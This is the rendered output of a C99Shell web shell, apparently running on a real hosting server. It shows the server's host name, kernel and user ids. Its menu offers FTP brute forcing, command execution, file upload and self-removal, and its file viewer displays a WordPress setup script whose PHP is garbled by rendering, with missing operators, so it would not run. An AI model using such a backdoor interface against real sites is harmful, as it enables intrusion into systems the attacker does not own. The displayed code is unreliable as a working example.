!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/local/ei2/   drwxr-xr-x
Free 6182.11 GB of 6263.31 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     wp.php (1.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/* Wordpress post-installation optimization script */

/* Include the rquired files to use the WP API and functions such as install() and activate_plugin() */
$path getcwd();
require_once (
"wp-load.php");
require_once (
"wp-admin/includes/plugin.php");
require_once (
"wp-admin/includes/plugin-install.php");
require_once (
"wp-admin/includes/class-wp-upgrader.php");
require_once (
"wp-admin/includes/file.php");
require_once (
"wp-admin/includes/misc.php");


$api plugins_api("plugin_information", array( "slug" => "Anti-spam" ));       /* Retreive information about the Anti-Spam plugin from the WP API */
$object = new Plugin_Upgrader();
$object -> install ($api -> download_link);     /* Install the plugin */
$result activate_plugin("$path/wp-content/plugins/anti-spam/anti-spam.php");  /* Activate the plugin */


unlink("wp-content/plugins/hello.php");         /* Delete the useless Hello Dolly plugin */


$buffer file_get_contents("wp-config.php");
$replacement "/**#@-*/ \ndefine('WP_AUTO_UPDATE_CORE', true );\n";            /*Enable automatic WP core updates*/
$replace preg_replace("/\/\*\*\#\@\-\*\//"$replacement$buffer1);
file_put_contents("wp-config.php"$replace);

/*
if (!file_exists('.htaccess')) {
    file_put_contents('.htaccess', '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /wordpress/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /wordpress/index.php [L]
</IfModule>

# END WordPress');
}
*/

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.012 ]--